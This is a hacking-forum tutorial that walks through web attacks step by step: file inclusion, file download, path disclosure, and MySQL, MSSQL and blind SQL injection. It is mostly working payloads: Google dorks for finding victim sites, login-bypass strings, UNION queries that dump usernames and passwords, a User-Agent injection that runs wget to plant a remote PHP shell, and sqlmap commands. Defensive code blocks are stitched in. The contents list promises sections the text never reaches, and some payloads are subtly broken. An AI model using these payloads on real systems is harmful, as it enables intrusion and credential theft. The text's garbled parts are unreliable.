

THE BEST WEBSITE HACKING TUTORIAL
This is a tutorial about web-hacking methods that I collected over the past year.
So I thought it would be nice if I shared it here on Ubers.org.
It took me some time to write this thread, so I have full credits.
If you like my tutorial please give me +rep, rate and comment.
Also if someone has more methods, contact me with a small guide and I will add it to the thread and of course give full credit.


Guide content:

[I] - Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
[5] Protection script


[II] Local file inclusion
[1] LFI?
[2] Finding vulnerable sites
[3] Checking site vulnerability
[4] Proc/self/environ
[5] Shell uploading


[III] Local file download
[1] LFD?
[2] Vulnerable script
[3] Vulnerability check
[4] Exploiting vulnerability
[5] Protection script


[IV] Full path disclosure

[V] MYSQL Injection
[1] Dorks
[2] Login


[VI] SQL Injection - with load file
[1] SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[10] Filter bypassing
[11] Site protection from SQL Injection


[VII] MSSQL Injection
[1] Finding number of columns
[2] Finding database version
[3] Finding table name
[4] Finding column name
[5] Taking data from columns


[VIII] Blind SQL Injection
[1] Blind SQL Injection?
[2] Site vulnerability check
[3] Finding database version
[4] MYSQL user
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[8] Taking data from columns using sqlmap


[IX] Postgre SQL Injection
[1] Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns


[X] Error based Postgre SQL Injection
[1] Error based Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding database version
[5] Finding table name
[6] Finding column name
[7] Taking data from columns


[XI] SQL Injection on ASPX
[1] Site vulnerability check
[2] Finding table name
[3] Finding column name
[4] Finding columns in admin table
[5] Finding username and password


[XII] Dot net nuke

[XIII] XSS
[1] XSS?
[2] Required stuff
[3] XSS types
[4] Testing XSS vulnerability
[5] Cookie stealing
[6] Filter bypassing


[XIV] CRLF
[1] CRLF?
[2] Vulnerable places
[3] Exploiting vulnerability and protection
[4] Vulnerable script


[XV] CSRF
[1] CSRF?
[2] Vulnerable places
[3] Exploiting vulnerability


[XVI] Server Side Includes | Server Side Inclusion
[1] Introduction Server Side Includes
[2] SSI creating
[3] Server Side Inclusion



END

So let's get started!

[I] - Remote file inclusion

1) RFI?
RFI (Remote File Inclusion) is a type of web attack. It occurs when a PHP script passes a value taken from a GET parameter straight to include(). The included file is usually a page in txt format whose content is printed.
Example:

Code:
http://www.site.com/index.php?page=home

Nowadays RFI is rarely found, and all you need to use it on a vulnerable site is a shell in txt format.
2) Vulnerable script
Code:
<?php
$page = $_GET['page'];   // value comes straight from the user
include($page);          // passed to include() without any check
?>

3) Exploiting vulnerability
We have the site:
Code:
http://www.site.com/index.php?page=home

Now instead of home we use our shell.
So we get:

Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?

If the site is vulnerable it should show the shell with the list of files from the site you are attacking.

4) Null byte bypass
Some scripts have a weak protection that appends an extension such as .html (or some other) to the included file:
Code:
<?php
$page = $_GET['page'];
include($page.".html");   // the extension is appended to whatever the user supplied
?>

In that case we use a null byte bypass.
Everything after the null byte is ignored. We also use the null byte to bypass picture upload checks and upload php instead, but I am not going to talk about that here.

So the link should look like this:

Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?

5) Protection script
The script looks like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>

So we add a check before including the file:
Code:
<?php
$page = $_GET['page'];
// only include the file if it exists under pages/ (note: this alone does not stop ../ inside that path)
if(file_exists("pages/".$page)) {
include("pages/".$page);
}
?>
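The file_exists() check above still accepts ../ in $page, so a file outside pages/ can pass it. Here is an added example (not code from the original post) of an allowlist-based include that stops the remote URLs of this section and the ../ traversal and null byte of section II alike; the page names, the pages/ directory and the php.ini directives are assumptions for the example.

```php
<?php
// Added example (not from the original post): allowlist-based include.
// The page key is looked up in a fixed map; the included path is never built from user input.
// Assumptions for the example: a pages/ directory next to this script and these three pages.

// Only names listed here can ever be included.
$allowed_pages = array(
    'home'    => 'home.html',
    'about'   => 'about.html',
    'contact' => 'contact.html',
);

$pages_dir = __DIR__ . '/pages/';

// Default to "home" when the parameter is absent.
$page = isset($_GET['page']) ? $_GET['page'] : 'home';

// page[]=home arrives as an array; refuse anything that is not a plain string so the
// lookup below cannot throw and leak a path in the error message (see section IV).
// A remote URL, "../../etc/passwd" or a name with a null byte is simply not a key
// in the allowlist, so it never reaches include().
if (!is_string($page) || !array_key_exists($page, $allowed_pages)) {
    http_response_code(404);
    echo 'Unknown page.';
    exit;
}

// Defence in depth: confirm the resolved path is still inside pages/ before including.
$real_dir  = realpath($pages_dir);
$real_path = realpath($pages_dir . $allowed_pages[$page]);
if ($real_dir === false || $real_path === false
    || strpos($real_path, $real_dir . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    echo 'Unknown page.';
    exit;
}

include $real_path;

// Server side, also keep allow_url_include=Off (and preferably allow_url_fopen=Off)
// in php.ini so include() cannot fetch a URL even if a check is missed elsewhere.
```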

[II] Local file inclusion

1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=

by adding
Code:
../../../../../../etc/passwd
(sometimes you also have to append the null byte bypass from section I after passwd).

2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=

3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd


When you enter this into the link, it prints this:
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that the site is vulnerable.

4) proc/self/environ

Now we want to see whether /proc/self/environ is readable through the site, so that we can upload a shell.

Instead of etc/passwd we put /proc/self/environ


If the page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........

then proc/self/environ is readable, so we can upload a shell.

5) Shell uploading

To upload a shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/

and the add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Open the site, e.g.:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ

Tools > Tamper Data
Click Start Tamper, then refresh the page and put the following code in the User-Agent header:

Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>

Click OK. To access the shell use:
Code:
www.link.com/shell.php

[III] Local file download

1) LFD?
LFD (Local File Download) is a vulnerability in a script used to download files via the GET method, but you can also use it with the POST method using the add-on Tamper Data.
Code:
http://site.com/download_file.php?file=notepad.exe

2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];                       // file name taken from the user without any check
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);                             // any path readable by the web server is sent back
exit;
}
?>

3) Vulnerability check

To check if the script is vulnerable we try to download etc/passwd.
So instead of:

Code:
http://site.com/download_file.php?file=notepad.exe

we use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If it starts to download, and when you open the file in a text editor it looks something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

the script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now that we know the script is vulnerable, we want to see which files are on the host. You can do it this way:
Code:
http://site.com/download_file.php?file=../

../ takes us one directory back and downloads the file.

1.1 It is possible that it downloads a file which, opened in a text editor, lists the files in the directories.
1.2 Or it is possible that it downloads a file, but when opened in a text editor the file is empty.

In case 1.1 we don't have to guess file names and directories and we can download whatever we want.
In case 1.2 we must guess file names and directories and we can download only files whose names we guess. There are a few programs that can help us find files (Acunetix and HTTrack Website Copier).

5) Protection script

We have the script mentioned at the start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

By adding if(file_exists("download/".$file)) we secure the script.
So it should look like:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
// only serve the file if it exists under download/ (note: file_exists() still follows ../ inside that path)
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize("download/".$file));
readfile("download/".$file);
exit;
}
}
?>
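file_exists("download/".$file) is also true for download/../../etc/passwd, so the check above does not stop the traversal shown in step 3. As an added example that is not code from the original post, here is a download handler that confines the request to the download/ directory by comparing realpath() results; the download/ directory and the file= parameter come from the scripts above, everything else is assumed.

```php
<?php
// Added example (not from the original post): a download handler that keeps the
// user-supplied name inside a fixed download/ directory. The resolved path is
// compared against the resolved base directory instead of trusting file_exists().
// Assumptions for the example: download/ sits next to this script; the name arrives in ?file=.

$base_dir = realpath(__DIR__ . '/download');
if ($base_dir === false) {
    http_response_code(500);
    exit('Download directory is missing.');
}

// Accept the name from GET only, and only when it is a plain string (not file[]=...).
$name = (isset($_GET['file']) && is_string($_GET['file'])) ? $_GET['file'] : '';

// Reject anything that is not a simple file name: no slashes, no "..", no control bytes.
if ($name === '' || $name === '.' || $name === '..' || !preg_match('/^[A-Za-z0-9._-]+$/', $name)) {
    http_response_code(400);
    exit('Invalid file name.');
}

$path = realpath($base_dir . DIRECTORY_SEPARATOR . $name);

// realpath() returns false for files that do not exist and resolves symlinks,
// so a link planted inside download/ that points outside is caught here too.
if ($path === false || !is_file($path) || strpos($path, $base_dir . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(404);
    exit('File not found.');
}

// Serve with a fixed, generic content type. basename() on the resolved path keeps
// the Content-Disposition value free of anything the user typed.
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;
```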

[IV] Full path disclosure

This method lets you, through errors in files or errors made by programmers, see which files are in which directories. You can't directly hack a site with it; it just helps you while hacking.

It is useful because it can make hacking faster and easier, and it can also help with Local File Inclusion (LFI) when a folder name has been changed, or some other file. You can find that out using FPD.

There are many ways of using an FPD vulnerability on a site; I'll explain the 2 most important.

The 1st is through an array, by adding square brackets to a link like this one:

Code:
index.php?page=home

To trigger the vulnerability, add [] in the right place:

Code:
index.php?page[]=home

That will give you an error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211

From this you can see that the directory blah exists on the site.

The 2nd method is to set the most commonly used cookie (a null session cookie), which you can do with a JavaScript injection; by adding the JavaScript code on the site you will get an error.

This is the JavaScript code:

Code:
javascript:void(document.cookie='PHPSESSID=');

Put it in your address bar and hit enter; when the page is refreshed you will get the error:

Code:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58

Then try to open the directory thems on the site; that should list the files in that directory.

Protection:
The simplest way to protect against these attacks is to turn off error reporting.
Edit or add:
Code:
error_reporting(0);

[V] MYSQL Injection

1) Dorks

Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp

I am gonna use:
Code:
http://site.com/Admin_Login.asp

2) Login

Now you can find some site with these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1 you can use one of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

password' or 1=1 makes the login query's condition always true and lets you log in.
So if you are able to log in, the site is vulnerable and you will be able to use the admin panel.



[VI] SQL Injection

1) SQL Injection?
SQL Injection is a type of web attack. The attacker uses a hole in the script to take all data from the database. Vulnerable sites are in the format:
Code:
http://www.link.com/index.php?id=

You can have anything else instead of index.

2) Finding vulnerable sites:
The best way to find a vulnerable site is by using google. We use these dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check:
There are 2 ways to check if a site is vulnerable.

1st way, we have the link:

Code:
http://site.com/book.php?id=141

we add just ' at the end of the link so we get this link:
Code:
http://site.com/book.php?id=141'

2nd way, we have the link:
Code:
http://site.com/book.php?id=141

we add +and+1=2-- at the end of the link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--

If some part of the page disappears (picture, text or something) or there is an error like (You have an error in your sql syntax), the site is vulnerable.

4) Finding number of columns
We can do it using order by, on the link:
Code:
http://site.com/book.php?id=141

adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5--

If the page opens normally there are more than 5 columns. Let's try with 10.
Code:
http://site.com/book.php?id=141+order+by+10--

Now some part of the site disappeared, which means that there are more than 5 and fewer than 10 columns. Let's try 7.
Code:
http://site.com/book.php?id=141+order+by+7--

The page opens normally, which means that there are more than 7 and fewer than 10 columns. Let's try 8.
Code:
http://site.com/book.php?id=141+order+by+8--

With 8 part of the site disappears, which means that there are 7 columns.

5) Finding vulnerable columns

Finding vulnerable columns is done with union select all. To the link (in this case) we add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

It prints numbers on the page (in this case 1 2 3 4 5 6 7), which means that data can be taken from any of those columns. We are going to take data from the second column.
6) Finding database version

As I said, we take data from the second column. Instead of number 2 we put version() or @@version
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

On the page, where number 2 was, it now shows the database version.
If the database version is 4 we have to guess the table and column names, but if the database version is 5 we do not have to guess them.

We have version 5.0.51a-24+lenny5, which means that we don't have to guess the table and column names.


7) Finding table name

If the database version is 4 you won't be able to list the table and column names; you have to guess them. If the database version is 5, skip this step.
Names of some possible tables:

Code:
admin
admins
user
users
member
members

Names of some possible columns:

Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd

If the database version is 5 we can get the table names with the next step: instead of number 2 we put group_concat(table_name), and after the number of the last column we add +from+information_schema.tables+where+table_schema=database()--

So we get this link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

Instead of number 2 it now shows the table names, in this case date, book, users. We are going to take columns from the users table.
8) Finding column name

We found the table we want, and now we want its columns. Instead of group_concat(table_name) we put group_concat(column_name), and instead of +from+information_schema.tables+where+table_schema=database()-- we put +from+information_schema.columns+where+table_name=hex--, where instead of hex we have to encode the table name in hex.
Go to:

Code:
http://www.string-functions.com/string-hex.aspx

write the name of the table (in this case users) and we get the hex value 7573657273, so now we can see the columns:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--

9) Taking data from columns

We got: id, name, surname, username, password, level.
We need only username and password.


Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is a colon and separates the username from the password. Instead of +from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

and we have the link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--

and a result such as:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which are the usernames and passwords from this site.

10) Filter bypassing

If, when you write union+select+all, the page says "not accessible", change it to UnIoN+sElEcT+aLl
On some sites spaces are filtered, so you can use + or /**/ instead (/* is the start of a comment and */ the end)
On some sites the database version is also filtered, so you can use unhex(hex(version()))

11) Site protection from SQL Injection

Just put this code in your script:
Code:
<?php
if(!is_numeric($_GET['id']))
{
// shown when someone tries to append ' or and+1=2 to the id
echo "Invalid id";
exit;   // stop here so the query below never runs with the bad value
}
?>
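The is_numeric() check only helps for numeric ids and does nothing for the login form of section V. As an added example (not code from the original post), here are both queries this tutorial attacks, the admin login and book.php?id=, rewritten with PDO prepared statements; the connection details and the table and column names (users, username, password_hash, books, title, author) are assumptions.

```php
<?php
// Added example (not from the original post): the two queries attacked in sections V
// and VI, written with PDO prepared statements so that user input is always sent as a
// parameter and never spliced into the SQL text.
// Assumptions for the example: a MySQL database "app" with tables users(id, username,
// password_hash) and books(id, title, author); credentials are placeholders.

$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app_user', 'secret', array(
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
));

// Section V: admin login. The payload  password' or 1=1--  is just a string compared
// against the stored hash; it cannot change the WHERE clause because the SQL text is fixed.
function login(PDO $pdo, $username, $password)
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :username');
    $stmt->execute(array(':username' => $username));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a stored password_hash() value; never compare plaintext passwords.
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Section VI: book.php?id=141. The id must be all digits (the page's is_numeric() idea,
// tightened), and it is still bound as an integer parameter, so "141 and 1=2" or
// "-141 union select ..." is never executed as SQL.
function getBook(PDO $pdo, $rawId)
{
    if (!ctype_digit((string) $rawId)) {
        http_response_code(400);
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, title, author FROM books WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Example usage with the request parameters the tutorial uses.
$userId = login(
    $pdo,
    isset($_POST['username']) ? $_POST['username'] : '',
    isset($_POST['password']) ? $_POST['password'] : ''
);
$book = getBook($pdo, isset($_GET['id']) ? $_GET['id'] : '');
```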

SQL Injection - Load File

You found a site with an SQL vulnerability; now you can try to access the mysql.user table and check for file privileges.

To see which user we are and whether we have access to mysql.user, we put 'user' instead of the vulnerable column and add '+from+mysql.user--' at the end of the URL.

It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--

If you get a username, it means that you have access to the mysql.user table and you can continue with this tutorial.

Now, to see if we have file privileges, instead of 'user' we put 'concat(user,0x3a,file_priv)', and of course '+from+mysql.user--'

Now the page lists usernames and file privileges. Find the username that was shown at the start, when you put 'user' in the column; if next to it there is a 'Y' (Yes), you have file privileges.

Load File:

All we have to do is write load_file('FILE NAME') in the vulnerable column.
We'll try with /etc/passwd, so we type load_file('/etc/passwd') in the vulnerable column.

Which looks like this:

Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--

If it gives us an error we can convert the file name to Char or Hex, but if we do that we must remove the quotes around the file name.

Hex e.g.
If we convert the file name to Hex, we add '0x' before it
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+mysql.user--

The hex code '2f6574632f706173737764' stands for '/etc/passwd'.

Recommended site for Hex:
Code:
www.string-functions.com/string-hex.aspx

If you decide to convert the file name to Char, then use 'load_file(char(converted file name))'

Which looks like:

Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4--

Where ' 47,101,116,99,47,112,97,115,115,119,100 ' stands for '/etc/passwd'

Char converter:
Code:
http://pookey.co.uk/binary.php

[VII] MSSQL Injection

1) Finding number of columns

I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234

To find the number of columns we use order by. We add +order+by+5-- at the end of the link.

Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--

So we get the following error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.

/sr/page/member.asp, line 38

which means that there are fewer than 5 columns; let's try with 4. We get the same error, so we try with 3 and get the following error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

/sr/page/member.asp, line 44

Which means that there are 3 columns.

2) Finding database version

To find the database version we use @@version.
Code:
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/sr/page/member.asp, line 38

and from here we can see the database version.

3) Finding table name

With MSSQL Injection it is not possible to get all tables at once; we must go one by one.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--

and we get: 
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.

/sr/page/member.asp, line 38

and we can see that we have the table 'Country'.

Now we have to find the other tables. We use not+in. So we have the link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.

/sr/page/member.asp, line 38

and from here we can see that we have an Admin table.

4) Finding column name

It is the same for columns. We cannot get all columns at once, so we have to do it one by one. In this case we use where+table_name='Admin'--. So we have the link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--

and we have error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.

/sr/page/member.asp, line 38

From here we can see that we have the column USERNAME. Now we need the rest of the columns, so we use not+in again.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.

/sr/page/member.asp, line 38

So the next column is PASSWD.

5) Taking data from columns

Now we put the column name instead of table_name, and after from we put the name of the table.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--

We get username OjuZwqAul.

It is same for password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--

We get password M7sWt2!2uq.

[VIII] Blind SQL Injection

1) Blind SQL Injection?

The difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection does not print any errors, any table or column names or column content. That is why it is called Blind SQL. You only watch whether a part of the site disappears: an image, text, etc. In Blind Injection we don't use -- or /* */.

2) Site vulnerability check

We have link:
Code:
http://www.site.com/index.php?id=1

We add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2

If any part of the page disappears, it means that the site is vulnerable.

3) Finding database version

As we said already, in this method nothing is printed, so we assert that the database version is 4. If part of the site disappears it means that the version is not 4, but if everything on the page stays as it should, the version is 4. We use @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4

If the page loads as it should then the version is 4; if not, we try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5

4) MYSQL user

First we check whether we are able to use select, because it is sometimes blocked.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1

If the page loads normally we can use select; if not, we can't. Now we check whether we have access to the MYSQL user table.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysql.user+limit+0,1)=1

Same as everything else: if the page loads normally we have access to mysql.user, if not, we don't. mysql.user is useful to get the password hash or to use load_file() and OUTFILE.

5) Finding table name

To find table names all we can do is guess. First we find the table name, then the column names from that table.
We have the link and we try the names of different tables. If the page loads normally it means that the table exists (ime_tabele stands for the table name).

Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1

Our main objective is to find data from the admin table; we can also try:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin

6) Finding column name

Now that we have found the table we wanted, it is time to find the column name. We do the same as for the table: if the name matches, the page loads normally and the column exists. We need login data, so the columns are commonly:

Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass

The link we use for columns is (ime_kolone stands for the column name, ime_tabele for the table name):

Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)from+ime_tabele+limit+0,1)=1

7) Taking data from columns

In the whole Blind SQL this is the most boring and longest part. Here we need an ASCII table.
Code:
http://www.asciitable.com/

We only look at the DEC and CHR columns of the ASCII table. First we get the username, letter by letter. So we need to guess the DEC value for some letter, e.g. for A it is 65.
We have the link:

Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+limit+0,1)1,1))>from DEC number

If the page loads normally we have found a real letter of the username. To find the second letter, change +limit+0,1 to +limit+1,1.
So now we are guessing the second letter... It is the same for the password... So after a long, long time we get the username and password. If there are more users and you want their passwords too, you will have to add a where clause.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+where+column_name=something+limit+0,1)1,1))>from DEC letter

For the where clause on the second column_name we usually use id, but other columns work too. E.g. for id:

Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+where+id=1+limit+0,1)1,1))>from DEC letter

8) Taking data from columns using sqlmap

As you have noticed already, you need a lot of time to get data from columns, so I would suggest you use sqlmap.
Windows download:

Code:
http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.zip
Unix download:
Code:
http://downloads.sourceforge.net/sqlmap ... 0.9.tar.gz

NOTE: almost all unix systems have sqlmap installed already, and you will also need python if you do not have it already.

Python download:
Code:
http://www.python.org/download/

Now we have to find the directory where sqlmap is located.
Start>run>cmd and go to the sqlmap directory using cd.
The command to start sqlmap for getting data with Blind SQL Injection on windows is:

Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

NOTE: for unix put python before sqlmap.py
So it should look like:
Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

If there are more users, as I said, use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"

After -u you put the link.
